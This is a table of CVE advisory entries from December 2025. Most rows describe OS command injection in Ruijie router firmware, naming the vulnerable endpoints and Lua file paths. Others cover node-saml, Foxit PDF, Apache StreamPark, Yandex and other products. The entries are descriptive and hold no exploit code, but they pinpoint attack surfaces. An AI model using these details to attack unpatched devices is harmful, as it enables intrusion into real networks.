| node-saml--node-saml | Node-SAML is a SAML library not dependent on any frameworks that runs in Node. In versions 5.0.1 and below, Node-SAML loads the assertion from the (unsigned) original response document. This is different from the parts that are verified when checking the signature. This allows an attacker to modify authentication details within a valid SAML assertion. For example, in one attack it is possible to remove any character from the SAML assertion username. This issue is fixed in version 5.1.0. | 2025-12-12 | not yet calculated | CVE-2025-54369 | https://github.com/node-saml/node-saml/security/advisories/GHSA-m837-g268-mmv7 https://github.com/node-saml/node-saml/commit/31ead9411ebc3e2385086fa9149b6c17732bca10 https://github.com/node-saml/node-saml/releases/tag/v5.1.0 |
| Japan Total System Co.,Ltd.--GroupSession Free edition | Stored cross-site scripting vulnerability exists in GroupSession Free edition prior to ver5.3.0, GroupSession byCloud prior to ver5.3.3, and GroupSession ZION prior to ver5.3.2. If a user accesses a crafted page or URL, an arbitrary script may be executed on the web browser of the user. | 2025-12-12 | not yet calculated | CVE-2025-54407 | https://groupsession.jp/info/info-news/security20251208 https://jvn.jp/en/jp/JVN19940619/ |
| Canonical--apport | It was discovered that process_crash() in data/apport in Canonical's Apport crash reporting tool may create crash files with incorrect group ownership, possibly exposing crash information beyond expected or intended groups. | 2025-12-10 | not yet calculated | CVE-2025-5467 | https://www.stratascale.com/resource/cve-2025-32462-ubuntu-apport-vulnerability/ https://bugs.launchpad.net/apport/+bug/2106338 |
| Yandex--Messenger | Uncontrolled Search Path Element vulnerability in Yandex Messenger on MacOS allows Search Order Hijacking. This issue affects Telemost: before 2.245. | 2025-12-09 | not yet calculated | CVE-2025-5469 | https://yandex.com/bugbounty/i/hall-of-fame-products |
| Yandex--Disk | Uncontrolled Search Path Element vulnerability in Yandex Disk on MacOS allows Search Order Hijacking. This issue affects Disk: before 3.2.45.3275. | 2025-12-09 | not yet calculated | CVE-2025-5470 | https://yandex.com/bugbounty/i/hall-of-fame-products |
| Yandex--Telemost | Uncontrolled Search Path Element vulnerability in Yandex Telemost on MacOS allows Search Order Hijacking. This issue affects Telemost: before 2.19.1. | 2025-12-09 | not yet calculated | CVE-2025-5471 | https://yandex.com/bugbounty/i/hall-of-fame-products |
| Apache Software Foundation--Apache StreamPark | In Apache StreamPark versions 2.0.0 through 2.1.7, a security vulnerability involving a hard-coded encryption key exists. This vulnerability occurs because the system uses a fixed, immutable key for encryption instead of dynamically generating or securely configuring the key. Attackers may obtain this key through reverse engineering or code analysis, potentially decrypting sensitive data or forging encrypted information, leading to information disclosure or unauthorized system access. This issue affects Apache StreamPark: from 2.0.0 before 2.1.7. Users are recommended to upgrade to version 2.1.7, which fixes the issue. | 2025-12-12 | not yet calculated | CVE-2025-54947 | https://lists.apache.org/thread/kdntmzyzrco75x9q6mc6s8lty1fxmog1 |
| Apache Software Foundation--Apache StreamPark | Weak Encryption Algorithm in StreamPark. The use of an AES cipher in ECB mode and a weak random number generator for encrypting sensitive data, including JWT tokens, may have risked exposing sensitive authentication data. This issue affects Apache StreamPark: from 2.0.0 before 2.1.7. Users are recommended to upgrade to version 2.1.7, which fixes the issue. | 2025-12-12 | not yet calculated | CVE-2025-54981 | https://lists.apache.org/thread/9rbvdvwg5fdhzjdgyrholgso53r26998 |
| n/a--Foxit PDF and Editor | An issue was discovered in Foxit PDF and Editor for Windows before 13.2 and 2025 before 2025.2. Opening a malicious PDF containing a crafted JavaScript call to search.query() with a crafted cDIPath parameter (e.g., "/") may cause an out-of-bounds read in internal path-parsing logic, potentially leading to information disclosure or memory corruption. | 2025-12-11 | not yet calculated | CVE-2025-55307 | https://www.foxit.com/support/security-bulletins.html |
| n/a--Foxit PDF and Editor | An issue was discovered in Foxit PDF and Editor for Windows before 13.2 and 2025 before 2025.2. A crafted PDF containing JavaScript that calls closeDoc() while internal objects are still in use can cause premature release of these objects. This use-after-free vulnerability may lead to memory corruption, potentially resulting in information disclosure when the PDF is opened. | 2025-12-11 | not yet calculated | CVE-2025-55308 | https://www.foxit.com/support/security-bulletins.html |
| n/a--Foxit PDF and Editor | An issue was discovered in Foxit PDF and Editor for Windows and macOS before 13.2 and 2025 before 2025.2. A crafted PDF can contain JavaScript that attaches an OnBlur action on a form field that destroys an annotation. During user right-click interaction, the program's internal focus change handling prematurely releases the annotation object, resulting in a use-after-free vulnerability that may cause memory corruption or application crashes. | 2025-12-11 | not yet calculated | CVE-2025-55309 | https://www.foxit.com/support/security-bulletins.html |
| n/a--Foxit PDF and Editor | An issue was discovered in Foxit PDF and Editor for Windows and macOS before 13.2 and 2025 before 2025.2. An attacker able to alter or replace the static HTML files used by the StartPage feature can cause the application to load malicious or compromised content upon startup. This may result in information disclosure, unauthorized data access, or other security impacts. | 2025-12-11 | not yet calculated | CVE-2025-55310 | https://www.foxit.com/support/security-bulletins.html |
| n/a--Foxit PDF and Editor | An issue was discovered in Foxit PDF and Editor for Windows and macOS before 13.2 and 2025 before 2025.2. A crafted PDF can use JavaScript to alter annotation content and subsequently clear the file's modification status via JavaScript interfaces. This circumvents digital signature verification by hiding document modifications, allowing an attacker to mislead users about the document's integrity and compromise the trustworthiness of signed PDFs. | 2025-12-11 | not yet calculated | CVE-2025-55311 | https://www.foxit.com/support/security-bulletins.html |
| n/a--Foxit PDF and Editor | An issue was discovered in Foxit PDF and Editor for Windows before 13.2 and 2025 before 2025.2. When pages in a PDF are deleted via JavaScript, the application may fail to properly update internal states. Subsequent annotation management operations assume these states are valid, causing dereference of invalid or released memory. This can lead to memory corruption, application crashes, and potentially allow an attacker to execute arbitrary code. | 2025-12-11 | not yet calculated | CVE-2025-55312 | https://www.foxit.com/support/security-bulletins.html |
| n/a--Foxit PDF and Editor | An issue was discovered in Foxit PDF and Editor for Windows and macOS before 13.2 and 2025 before 2025.2. They allow potential arbitrary code execution when processing crafted PDF files. The vulnerability stems from insufficient handling of memory allocation failures after assigning an extremely large value to a form field's charLimit property via JavaScript. This can result in memory corruption and may allow an attacker to execute arbitrary code by persuading a user to open a malicious file. | 2025-12-11 | not yet calculated | CVE-2025-55313 | https://www.foxit.com/support/security-bulletins.html |
| n/a--Foxit PDF and Editor | An issue was discovered in Foxit PDF and Editor for Windows and macOS before 13.2 and 2025 before 2025.2. When pages in a PDF are deleted via JavaScript, the application may fail to properly update internal states. Subsequent annotation management operations assume these states are valid, causing dereference of invalid or released memory. This can lead to memory corruption, application crashes, and potentially allow an attacker to execute arbitrary code. | 2025-12-11 | not yet calculated | CVE-2025-55314 | https://www.foxit.com/support/security-bulletins.html |
| n/a--HotelDruid v3.0.7 and before | HotelDruid v3.0.7 and before is vulnerable to Cross Site Scripting (XSS) in the /modifica_app.php file. | 2025-12-11 | not yet calculated | CVE-2025-55816 | https://www.hoteldruid.com/en/ https://www.partywave.site/show/research/cve-2025-55816-xss-and-raptx |
| n/a--Ruijie RG-RAP2200(E) 247 2200 | OS Command Injection vulnerability in Ruijie RG-RAP2200(E) 247 2200 allowing attackers to execute arbitrary commands via a crafted POST request to the module_set in file /usr/local/lua/dev_sta/nbr_cwmp.lua. | 2025-12-11 | not yet calculated | CVE-2025-56077 | https://1drv.ms/t/c/12406a392c92914b/EURTWAoIJNRMtvzNPi08CToB780nsKPNHZ2Fdmcf9xsoRA?e=jHygdj https://1drv.ms/f/c/12406a392c92914b/EvnzTspA23NAl-T9w70dG4MBnWWojsrzAeM1i-ed2EauAA?e=AYOxPM https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56077.md |
| n/a--Ruijie RG-EW1300G EW1300G V1.00/V2.00/V4.00 | OS Command Injection vulnerability in Ruijie RG-EW1300G EW1300G V1.00/V2.00/V4.00 allowing attackers to execute arbitrary commands via a crafted POST request to the module_get in file /usr/local/lua/dev_sta/networkConnect.lua. | 2025-12-11 | not yet calculated | CVE-2025-56079 | https://1drv.ms/t/c/12406a392c92914b/EZdYNxRd8ilMrCRXLnltUKEBiBXJzrTc9i7Y643cuho9PA?e=7Bifxw https://1drv.ms/f/c/12406a392c92914b/EjGDN1e4xfZOhROI3hzjKr0Bb9TVCN03MAR_VK56P8V3Ug?e=NmUXvt https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56079.md |
| n/a--Ruijie RG-BCR RG-BCR600W | OS Command Injection vulnerability in Ruijie RG-BCR RG-BCR600W allowing attackers to execute arbitrary commands via a crafted POST request to the check_changes in file /usr/lib/lua/luci/controller/admin/common.lua. | 2025-12-11 | not yet calculated | CVE-2025-56082 | https://1drv.ms/t/c/12406a392c92914b/EfCFw0RRV0hJvpV0rBLvTvABtWGVbrHzIPwPyku7phQ3Dg?e=GMqLpV https://1drv.ms/f/c/12406a392c92914b/Evvem8Mw6SlNh-ZJpY_9SAsBq2iDi88TFdFdA1Am3PdfCQ?e=YeLYxb https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56082.md |
| n/a--Ruijie X30-PRO X30-PRO-V1_09241521 | OS Command Injection vulnerability in Ruijie X30-PRO X30-PRO-V1_09241521 allowing attackers to execute arbitrary commands via a crafted POST request to the module_set in file /usr/local/lua/dev_sta/nbr_networkId_merge.lua. | 2025-12-11 | not yet calculated | CVE-2025-56083 | https://1drv.ms/t/c/12406a392c92914b/EciYj-O9Oi1PgNsZdTao0iwBub3gdfqA3safE0A4I9foYg?e=Mi39JB https://1drv.ms/f/c/12406a392c92914b/EtGIxwWujwxBvQhL9wgnUIwBkg-mndJJX07Igr6d0cic-g?e=4KJbWY https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56083.md |
| n/a--Ruijie RG-EW1800GX PRO B11P226_EW1800GX-PRO_10223117 | OS Command Injection vulnerability in Ruijie RG-EW1800GX PRO B11P226_EW1800GX-PRO_10223117 allowing attackers to execute arbitrary commands via a crafted POST request to the module_set in file /usr/local/lua/dev_sta/nbr_cwmp.lua. | 2025-12-11 | not yet calculated | CVE-2025-56084 | https://1drv.ms/t/c/12406a392c92914b/EdfdfnvOxAhJqdeIGlRRo6ABHJz03PPPBYIMdLoD6iNhlg?e=qNhi6o https://1drv.ms/f/c/12406a392c92914b/Eohr-0awt6VAuiLCNhCG0rgBLQip6nJpl-9Hy0OqB4MvFg?e=DIfBxi https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56084.md |
| n/a--Ruijie RG-EW1200 EW_3.0(1)B11P227_EW1200_11130208RG-EW1200 V1.00 | OS Command Injection vulnerability in Ruijie RG-EW1200 EW_3.0(1)B11P227_EW1200_11130208RG-EW1200 V1.00 allowing attackers to execute arbitrary commands via a crafted POST request to the module_set in file /usr/local/lua/dev_config/config_retain.lua. | 2025-12-11 | not yet calculated | CVE-2025-56085 | https://1drv.ms/t/c/12406a392c92914b/ERuoK3MLW2RLpQ6qOoGs5wIB73tNnsDzRT8U6U6z4VmskQ?e=KIjaOa https://1drv.ms/f/c/12406a392c92914b/EuESCSUsYvtAtfW1SfmGGxsBw-kN9iCbpnUU9T8TXofH3w?e=kp5OXK https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56085.md |
| n/a--Ruijie RG-EW1200 EW_3.0(1)B11P227_EW1200_11130208RG-EW1200 V1.00 | OS Command Injection vulnerability in Ruijie RG-EW1200 EW_3.0(1)B11P227_EW1200_11130208RG-EW1200 V1.00 allowing attackers to execute arbitrary commands via a crafted POST request to the module_get in file /usr/local/lua/dev_sta/networkConnect.lua. | 2025-12-11 | not yet calculated | CVE-2025-56086 | https://1drv.ms/f/c/12406a392c92914b/EuESCSUsYvtAtfW1SfmGGxsBw-kN9iCbpnUU9T8TXofH3w?e=kp5OXK https://1drv.ms/t/c/12406a392c92914b/ETgTxS2wFBlCjG4DP56-PjkBWwvraLHZ-BVaWh9Vs9_SuA?e=aTbjEe https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56086.md |
| n/a--Ruijie RG-BCR RG-BCR600W | OS Command Injection vulnerability in Ruijie RG-BCR RG-BCR600W allowing attackers to execute arbitrary commands via a crafted POST request to the run_tcpdump in file /usr/lib/lua/luci/controller/admin/common_tcpdump.lua. | 2025-12-11 | not yet calculated | CVE-2025-56087 | https://1drv.ms/f/c/12406a392c92914b/Evvem8Mw6SlNh-ZJpY_9SAsBq2iDi88TFdFdA1Am3PdfCQ?e=YeLYxb https://1drv.ms/t/c/12406a392c92914b/Echt6Ult6oNBv8c0GnssJeEBmbJbPx8enDixRCuyiWcKsw?e=2zJ5I2 https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56087.md |
| n/a--Ruijie RG-BCR RG-BCR860 | OS Command Injection vulnerability in Ruijie RG-BCR RG-BCR860 allowing attackers to execute arbitrary commands via a crafted POST request to the action_service in file /usr/lib/lua/luci/controller/admin/service.lua. | 2025-12-11 | not yet calculated | CVE-2025-56088 | https://1drv.ms/f/c/12406a392c92914b/EqEQemupso9DldgG-EcUI8IBLpEWP_S-f6vpeUtYztYYCg?e=gX4A10 https://1drv.ms/t/c/12406a392c92914b/EQ5pK82-KmxKht6YgsEzaOsBzrC05Cael1vwpfM9ZxX97Q?e=qEgmtB https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56088.md |
| n/a--Ruijie M18 EW_3.0(1)B11P226_M18_10223116 | OS Command Injection vulnerability in Ruijie M18 EW_3.0(1)B11P226_M18_10223116 allowing attackers to execute arbitrary commands via a crafted POST request to the module_set in file /usr/local/lua/dev_sta/nbr_cwmp.lua. | 2025-12-11 | not yet calculated | CVE-2025-56089 | https://1drv.ms/t/c/12406a392c92914b/Ea56irtVj4dNs59Pzz7fkiIBQeVLjDcMDEXC2FpCQydIZQ?e=70gcOe https://1drv.ms/f/c/12406a392c92914b/EmXarTTNPwFHjk8lLwQIqj8Ba9nlq-owLMBtEKpBwMrn5A?e=vvi2dM https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56089.md |
| n/a--Ruijie RG-EW1200G PRO RG-EW1200G PRO V1.00/V2.00/V3.00/V4.00 | OS Command Injection vulnerability in Ruijie RG-EW1200G PRO RG-EW1200G PRO V1.00/V2.00/V3.00/V4.00 allowing attackers to execute arbitrary commands via a crafted POST request to the module_set in file /usr/local/lua/dev_config/config_retain.lua. | 2025-12-11 | not yet calculated | CVE-2025-56090 | https://1drv.ms/t/c/12406a392c92914b/EfSHWqE3N11FpgQsV1BlZk0BxXIhFQjIp_xmJYIq1APvrw?e=JCIm6k https://1drv.ms/f/c/12406a392c92914b/EkH0xWseMXBJg-Ck_uD34fcB-3pDo3MAQc2AKNlXqwYr2w?e=GU9l62 https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56090.md |
| n/a--Ruijie RG-EW1800GX B11P226_EW1800GX_10223121 | OS Command Injection vulnerability in Ruijie RG-EW1800GX B11P226_EW1800GX_10223121 allowing attackers to execute arbitrary commands via a crafted POST request to the module_set in file /usr/local/lua/dev_config/config_retain.lua. | 2025-12-11 | not yet calculated | CVE-2025-56091 | https://1drv.ms/t/c/12406a392c92914b/EdiWfxSbC0pAu_oksKjm2xgBXSCavYBBJt8V51JkcH4Dsw?e=OhOVCN https://1drv.ms/f/c/12406a392c92914b/EgUg1zJuaItDmLxZhkCg4B8BcJTRYnXyX4ePIIjNoZrRew?e=a23cK6 https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56091.md |
| n/a--Ruijie X30 PRO V1 X30-PRO-V1_09241521 | OS Command Injection vulnerability in Ruijie X30 PRO V1 X30-PRO-V1_09241521 allowing attackers to execute arbitrary commands via a crafted POST request to the module_get in file /usr/local/lua/dev_sta/networkConnect.lua. | 2025-12-11 | not yet calculated | CVE-2025-56092 | https://1drv.ms/f/c/12406a392c92914b/EtGIxwWujwxBvQhL9wgnUIwBkg-mndJJX07Igr6d0cic-g?e=4KJbWY https://1drv.ms/t/c/12406a392c92914b/EaD98URfTfFKm1v_MTfU-UEBUxRf5vj3O0x7fhabn5_l9A?e=BuNPV9 https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56091.md |
| n/a--Ruijie X30-PRO X30-PRO-V1_09241521 | OS Command Injection vulnerability in Ruijie X30-PRO X30-PRO-V1_09241521 allowing attackers to execute arbitrary commands via a crafted POST request to the setWisp in file /usr/lib/lua/luci/modules/wireless.lua. | 2025-12-11 | not yet calculated | CVE-2025-56093 | https://1drv.ms/f/c/12406a392c92914b/EtGIxwWujwxBvQhL9wgnUIwBkg-mndJJX07Igr6d0cic-g?e=4KJbWY https://1drv.ms/t/c/12406a392c92914b/Edoz9sBTjeJMqw8K0f3lWgMBNxBlpE9IIUwOX2h2S1cMhw?e=46VlOq https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56092.md https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56093.md |
| n/a--Ruijie X30-PRO X30-PRO-V1_09241521 | OS Command Injection vulnerability in Ruijie X30-PRO X30-PRO-V1_09241521 allowing attackers to execute arbitrary commands via a crafted POST request to the module_get in file /usr/local/lua/dev_sta/host_access_delay.lua. | 2025-12-11 | not yet calculated | CVE-2025-56094 | https://1drv.ms/f/c/12406a392c92914b/EtGIxwWujwxBvQhL9wgnUIwBkg-mndJJX07Igr6d0cic-g?e=4KJbWY https://1drv.ms/t/c/12406a392c92914b/EX8LVTGd3L9OrXvTuHDFITQBnWL-5C-CINxUmowR7vCVig?e=Quevaq https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56094.md |
| n/a--Ruijie RG-EW1200G PRO RG-EW1200G PRO V1.00/V2.00/V3.00/V4.00 | OS Command Injection vulnerability in Ruijie RG-EW1200G PRO RG-EW1200G PRO V1.00/V2.00/V3.00/V4.00 allowing attackers to execute arbitrary commands via a crafted POST request to the module_set in file /usr/local/lua/dev_sta/nbr_cwmp.lua. | 2025-12-11 | not yet calculated | CVE-2025-56095 | https://1drv.ms/f/c/12406a392c92914b/EkH0xWseMXBJg-Ck_uD34fcB-3pDo3MAQc2AKNlXqwYr2w?e=GU9l62 https://1drv.ms/t/c/12406a392c92914b/EQgGsVREbAJEv4dCG7LAzoYBUiS4nCjWKun_QhenDHzU0Q?e=Ly0lll https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56095.md |
| n/a--Ruijie RG-BCR RG-BCR600W | OS Command Injection vulnerability in Ruijie RG-BCR RG-BCR600W allowing attackers to execute arbitrary commands via a crafted POST request to the restart_modules in file /usr/lib/lua/luci/controller/admin/common.lua. | 2025-12-11 | not yet calculated | CVE-2025-56096 | https://1drv.ms/f/c/12406a392c92914b/Evvem8Mw6SlNh-ZJpY_9SAsBq2iDi88TFdFdA1Am3PdfCQ?e=YeLYxb https://1drv.ms/t/c/12406a392c92914b/EQ8FKwFLNjBLlL9hyg_YkUoBdsj_FcNtQsjdmKQ5M4-10A?e=bFC7Jg https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56096.md |
| n/a--Ruijie RG-EW1800GX PRO B11P226_EW1800GX-PRO_10223117 | OS Command Injection vulnerability in Ruijie RG-EW1800GX PRO B11P226_EW1800GX-PRO_10223117 allowing attackers to execute arbitrary commands via a crafted POST request to the module_set in file /usr/local/lua/dev_config/config_retain.lua. | 2025-12-11 | not yet calculated | CVE-2025-56097 | https://1drv.ms/f/c/12406a392c92914b/Eohr-0awt6VAuiLCNhCG0rgBLQip6nJpl-9Hy0OqB4MvFg?e=DIfBxi https://1drv.ms/t/c/12406a392c92914b/EeVJ2woYmHVHn_C0Sy_iRZsB4yZQFJDXSBOwMSZW0KXJrQ?e=VVGxWb https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56097.md |
| n/a--Ruijie X30-PRO X30-PRO-V1_09241521 | OS Command Injection vulnerability in Ruijie X30-PRO X30-PRO-V1_09241521 allowing attackers to execute arbitrary commands via a crafted POST request to the module_get in file /usr/local/lua/dev_sta/networkConnect.lua. | 2025-12-11 | not yet calculated | CVE-2025-56098 | https://1drv.ms/f/c/12406a392c92914b/EtGIxwWujwxBvQhL9wgnUIwBkg-mndJJX07Igr6d0cic-g?e=4KJbWY https://1drv.ms/t/c/12406a392c92914b/EYC9-EvSxKZOum9kuAtPDq4BjKb0c8IV6B52lDEAD33pEA?e=2C0BKO https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56098.md |
| n/a--Ruijie RG-YST AP_3.0(1)B11P280YST250F | OS Command Injection vulnerability in Ruijie RG-YST AP_3.0(1)B11P280YST250F allowing attackers to execute arbitrary commands via a crafted POST request to the pwdmodify in file /usr/lib/lua/luci/modules/common.lua. | 2025-12-11 | not yet calculated | CVE-2025-56099 | https://1drv.ms/t/c/12406a392c92914b/ETaD7apCrPFLtMj473NHV2gBaYrKV9A4ZZKMfyWgC949Zw?e=iyjx5g https://1drv.ms/f/c/12406a392c92914b/EjgEtJ5yojhDpEoT-PbidhsBzsbVnT-D-32qK1bCrQN3-g?e=cVRYgN https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56099.md |
| n/a--Ruijie M18 EW_3.0(1)B11P226_M18_10223116 | OS Command Injection vulnerability in Ruijie M18 EW_3.0(1)B11P226_M18_10223116 allowing attackers to execute arbitrary commands via a crafted POST request to the module_get in file /usr/local/lua/dev_sta/networkConnect.lua. | 2025-12-11 | not yet calculated | CVE-2025-56101 | https://1drv.ms/f/c/12406a392c92914b/EmXarTTNPwFHjk8lLwQIqj8Ba9nlq-owLMBtEKpBwMrn5A?e=vvi2dM https://1drv.ms/t/c/12406a392c92914b/EbNlU_0K0v1Krzq7CaUWn0AB_yu3ICrdmwoVuS2txFGMhA?e=0gIUMh https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56101.md |
| n/a--Ruijie RG-EW1800GX B11P226_EW1800GX_10223121 | OS Command Injection vulnerability in Ruijie RG-EW1800GX B11P226_EW1800GX_10223121 allowing attackers to execute arbitrary commands via a crafted POST request to the module_get in file /usr/local/lua/dev_sta/networkConnect.lua. | 2025-12-11 | not yet calculated | CVE-2025-56102 | https://1drv.ms/f/c/12406a392c92914b/EgUg1zJuaItDmLxZhkCg4B8BcJTRYnXyX4ePIIjNoZrRew?e=a23cK6 https://1drv.ms/t/c/12406a392c92914b/EXNcf0lLKjZLv6U4-ErArMkBKqwLJhJbiJwuQl5MSd0W3w?e=GfXnnz https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56102.md |
| n/a--Ruijie RG-EW1800GX B11P226_EW1800GX_10223121 | OS Command Injection vulnerability in Ruijie RG-EW1800GX B11P226_EW1800GX_10223121 allowing attackers to execute arbitrary commands via a crafted POST request to the module_set in file /usr/local/lua/dev_sta/nbr_cwmp.lua. | 2025-12-11 | not yet calculated | CVE-2025-56106 | https://1drv.ms/f/c/12406a392c92914b/EgUg1zJuaItDmLxZhkCg4B8BcJTRYnXyX4ePIIjNoZrRew?e=a23cK6 https://1drv.ms/t/c/12406a392c92914b/EcUP8SMciOVBgNEy31-OnnkBQRk_fUCDWUtdDX8UBfbXEA?e=FuQDPi https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56106.md |
| n/a--Ruijie RG-BCR RG-BCR600W | OS Command Injection vulnerability in Ruijie RG-BCR RG-BCR600W allowing attackers to execute arbitrary commands via a crafted POST request to the submit_wifi in file /usr/lib/lua/luci/controller/admin/common_quick_config.lua. | 2025-12-11 | not yet calculated | CVE-2025-56107 | https://1drv.ms/f/c/12406a392c92914b/Evvem8Mw6SlNh-ZJpY_9SAsBq2iDi88TFdFdA1Am3PdfCQ?e=YeLYxb https://1drv.ms/t/c/12406a392c92914b/ESr3_xpg5ZxFkRAKG7hiGVcBF3Cw_52dWpSvUOtgx3hPhw?e=c5RTxg https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56107.md |
| n/a--Ruijie X30-PRO X30-PRO-V1_09241521 | OS Command Injection vulnerability in Ruijie X30-PRO X30-PRO-V1_09241521 allowing attackers to execute arbitrary commands via a crafted POST request to the pwdmodify in file /usr/lib/lua/luci/modules/common.lua. | 2025-12-11 | not yet calculated | CVE-2025-56108 | https://1drv.ms/f/c/12406a392c92914b/EtGIxwWujwxBvQhL9wgnUIwBkg-mndJJX07Igr6d0cic-g?e=4KJbWY https://1drv.ms/t/c/12406a392c92914b/Ecib6--fxv9HhrfAdhmP5R4BOPDcTcqTOBt0hQBEx5BTxA?e=s3ejN1 https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56108.md |
| n/a--Ruijie RG-BCR RG-BCR860 | OS Command Injection vulnerability in Ruijie RG-BCR RG-BCR860 allowing attackers to execute arbitrary commands via a crafted POST request to the action_wireless in file /usr/lib/lua/luci/control/admin/wireless.lua. | 2025-12-11 | not yet calculated | CVE-2025-56109 | https://1drv.ms/f/c/12406a392c92914b/EqEQemupso9DldgG-EcUI8IBLpEWP_S-f6vpeUtYztYYCg?e=gX4A10 https://1drv.ms/t/c/12406a392c92914b/Eebxh85meOlFnvAANaOt7WgBy_WVGYtW6X8dzvZBZSenbw?e=aaqmPN https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56109.md |
| n/a--Ruijie RG-BCR RG-BCR860 | OS Command Injection vulnerability in Ruijie RG-BCR RG-BCR860 allowing attackers to execute arbitrary commands via a crafted POST request to the action_deal_update in file /usr/lib/lua/luci/controller/api/rcmsAPI.lua. | 2025-12-11 | not yet calculated | CVE-2025-56110 | https://1drv.ms/f/c/12406a392c92914b/EqEQemupso9DldgG-EcUI8IBLpEWP_S-f6vpeUtYztYYCg?e=gX4A10 https://1drv.ms/t/c/12406a392c92914b/EWK5h1b7Ig1Pt-jdTSQ6t5wBYIbKPHujlBimUpdYNVR-6A?e=eQRXef https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56110.md |
| n/a--Ruijie RG-BCR RG-BCR860 | OS Command Injection vulnerability in Ruijie RG-BCR RG-BCR860 allowing attackers to execute arbitrary commands via a crafted POST request to the network_set_wan_conf in file /usr/lib/lua/luci/controller/admin/netport.lua. | 2025-12-11 | not yet calculated | CVE-2025-56111 | https://1drv.ms/f/c/12406a392c92914b/EqEQemupso9DldgG-EcUI8IBLpEWP_S-f6vpeUtYztYYCg?e=gX4A10 https://1drv.ms/t/c/12406a392c92914b/ERJa0DnnR29MqtbLLRQirGYB4qA9dAdpn6eIJH9LwNlBmw?e=y6KkGo https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56111.md |
| n/a--Ruijie RG-YST EST, YSTAP_3.0(1)B11P280YST250F V1.xxV2.xx | OS Command Injection vulnerability in Ruijie RG-YST EST, YSTAP_3.0(1)B11P280YST250F V1.xxV2.xx allowing attackers to execute arbitrary commands via a crafted POST request to the pwdmodify in file /usr/lib/lua/luci/modules/common.lua. | 2025-12-11 | not yet calculated | CVE-2025-56113 | https://1drv.ms/t/c/12406a392c92914b/EY_XOykAOvJJkGsDkmahTboBmmvNWczbXF3brroYsTWmTA?e=2Itzta https://1drv.ms/f/c/12406a392c92914b/EsGqqVSQqCVBjjz2FhAHAiAB4MCHo41vIuw2wPgLykbupA?e=YgF1gt https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56113.md |
| n/a--Ruijie M18 EW_3.0(1)B11P226_M18_10223116 | OS Command Injection vulnerability in Ruijie M18 EW_3.0(1)B11P226_M18_10223116 allowing attackers to execute arbitrary commands via a crafted POST request to the module_set in file /usr/local/lua/dev_config/config_retain.lua. | 2025-12-11 | not yet calculated | CVE-2025-56114 | https://1drv.ms/f/c/12406a392c92914b/EmXarTTNPwFHjk8lLwQIqj8Ba9nlq-owLMBtEKpBwMrn5A?e=vvi2dM https://1drv.ms/t/c/12406a392c92914b/EWfEhLkTSblOur72XhaQ7W4BsxQ1IWXZ-Wkcv9WC7AYb-g?e=LpMdqT https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56114.md |
| n/a--Ruijie X30-PRO X30-PRO-V1_09241521 | OS Command Injection vulnerability in Ruijie X30-PRO X30-PRO-V1_09241521 allowing attackers to execute arbitrary commands via a crafted POST request to the module_set in file /usr/local/lua/dev_sta/nbr_cwmp.lua. | 2025-12-11 | not yet calculated | CVE-2025-56117 | https://1drv.ms/f/c/12406a392c92914b/EtGIxwWujwxBvQhL9wgnUIwBkg-mndJJX07Igr6d0cic-g?e=4KJbWY https://1drv.ms/t/c/12406a392c92914b/Ed2lBCN9vhdPnEs7WKvpfEQBp7czazgO9PYxS2TFSHx7TQ?e=HZZaGq https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56117.md |
